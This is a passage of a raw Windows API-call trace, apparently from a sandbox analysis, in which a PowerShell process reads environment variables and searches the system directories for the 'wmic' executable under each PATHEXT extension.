CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.686] CoTaskMemFree (pv=0x2af7b0) [0127.690] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.690] CoTaskMemFree (pv=0x2af7b0) [0127.730] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.730] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.730] CoTaskMemFree (pv=0x2af7b0) [0127.862] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.862] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.862] CoTaskMemFree (pv=0x2af7b0) [0127.872] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.872] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.872] CoTaskMemFree (pv=0x2af7b0) [0127.874] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.874] CoTaskMemFree (pv=0x2af7b0) [0127.883] VirtualQuery (in: lpAddress=0x1c9ada70, lpBuffer=0x1c9ae930, dwLength=0x30 | out: lpBuffer=0x1c9ae930*(BaseAddress=0x1c9ad000, AllocationBase=0x1c020000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0127.887] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.887] CoTaskMemFree (pv=0x2af7b0) [0127.891] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.891] CoTaskMemFree (pv=0x2af7b0) [0127.891] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.891] CoTaskMemFree (pv=0x2af7b0) [0127.893] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.893] CoTaskMemFree (pv=0x2af7b0) [0127.915] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.915] CoTaskMemFree (pv=0x2af7b0) [0128.787] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0128.787] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0128.787] CoTaskMemFree (pv=0x2af7b0) [0128.795] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0128.795] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0128.795] CoTaskMemFree (pv=0x2af7b0) [0128.797] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0128.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0128.797] CoTaskMemFree (pv=0x2af7b0) [0128.802] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0128.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0128.803] CoTaskMemFree (pv=0x2af7b0) [0128.804] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0128.805] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0128.805] CoTaskMemFree (pv=0x2af7b0) [0128.806] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0128.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0128.807] CoTaskMemFree (pv=0x2af7b0) [0128.809] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0128.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0128.809] CoTaskMemFree (pv=0x2af7b0) [0128.855] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0128.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0128.855] CoTaskMemFree (pv=0x2af7b0) [0128.970] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0128.970] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.970] CoTaskMemFree (pv=0x2af7b0) [0128.976] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0128.976] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.976] CoTaskMemFree (pv=0x2af7b0) [0128.991] CoTaskMemAlloc (cb=0x20e) returned 0x2bc010 [0128.991] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bc010 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0128.991] CoTaskMemFree (pv=0x2bc010) [0128.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.000] SetErrorMode (uMode=0x1) returned 0x1 [0129.006] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.008] SetErrorMode (uMode=0x1) returned 0x1 [0129.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.010] SetErrorMode (uMode=0x1) returned 0x1 [0129.010] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.010] SetErrorMode (uMode=0x1) returned 0x1 [0129.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.011] SetErrorMode (uMode=0x1) returned 0x1 [0129.011] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.011] SetErrorMode (uMode=0x1) returned 0x1 [0129.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.011] SetErrorMode (uMode=0x1) returned 0x1 [0129.012] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.012] SetErrorMode (uMode=0x1) returned 0x1 [0129.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.012] SetErrorMode (uMode=0x1) returned 0x1 [0129.012] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.013] SetErrorMode (uMode=0x1) returned 0x1 [0129.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.013] SetErrorMode (uMode=0x1) returned 0x1 [0129.013] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.014] SetErrorMode (uMode=0x1) returned 0x1 [0129.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.014] SetErrorMode (uMode=0x1) returned 0x1 [0129.014] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.014] SetErrorMode (uMode=0x1) returned 0x1 [0129.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.015] SetErrorMode (uMode=0x1) returned 0x1 [0129.015] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.015] SetErrorMode (uMode=0x1) returned 0x1 [0129.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.016] SetErrorMode (uMode=0x1) returned 0x1 [0129.016] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.016] SetErrorMode (uMode=0x1) returned 0x1 [0129.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.016] SetErrorMode (uMode=0x1) returned 0x1 [0129.016] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.017] SetErrorMode (uMode=0x1) returned 0x1 [0129.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.017] SetErrorMode (uMode=0x1) returned 0x1 [0129.017] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.018] SetErrorMode (uMode=0x1) returned 0x1 [0129.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.018] SetErrorMode (uMode=0x1) returned 0x1 [0129.018] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.018] SetErrorMode (uMode=0x1) returned 0x1 [0129.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.019] SetErrorMode (uMode=0x1) returned 0x1 [0129.019] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.019] SetErrorMode (uMode=0x1) returned 0x1 [0129.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.020] SetErrorMode (uMode=0x1) returned 0x1 [0129.020] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.020] SetErrorMode (uMode=0x1) returned 0x1 [0129.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.020] SetErrorMode (uMode=0x1) returned 0x1 [0129.020] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.021] SetErrorMode (uMode=0x1) returned 0x1 [0129.021] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.021] SetErrorMode (uMode=0x1) returned 0x1 [0129.021] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.022] SetErrorMode (uMode=0x1) returned 0x1 [0129.022] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.022] SetErrorMode (uMode=0x1) returned 0x1 [0129.022] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.023] SetErrorMode (uMode=0x1) returned 0x1 [0129.023] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.023] SetErrorMode (uMode=0x1) returned 0x1 [0129.023] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.023] SetErrorMode (uMode=0x1) returned 0x1 [0129.024] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.024] SetErrorMode (uMode=0x1) returned 0x1 [0129.024] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.024] SetErrorMode (uMode=0x1) returned 0x1 [0129.024] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.024] SetErrorMode (uMode=0x1) returned 0x1 [0129.025] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.025] SetErrorMode (uMode=0x1) returned 0x1 [0129.025] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.025] SetErrorMode (uMode=0x1) returned 0x1 [0129.025] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.026] SetErrorMode (uMode=0x1) returned 0x1 [0129.026] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.026] SetErrorMode (uMode=0x1) returned 0x1 [0129.026] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.026] SetErrorMode (uMode=0x1) returned 0x1 [0129.027] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.027] SetErrorMode (uMode=0x1) returned 0x1 [0129.027] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.027] SetErrorMode (uMode=0x1) returned 0x1 [0129.028] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.028] SetErrorMode (uMode=0x1) returned 0x1 [0129.028] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.028] SetErrorMode (uMode=0x1) returned 0x1 [0129.028] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.029] SetErrorMode (uMode=0x1) returned 0x1 [0129.029] FindFirstFileW (in: 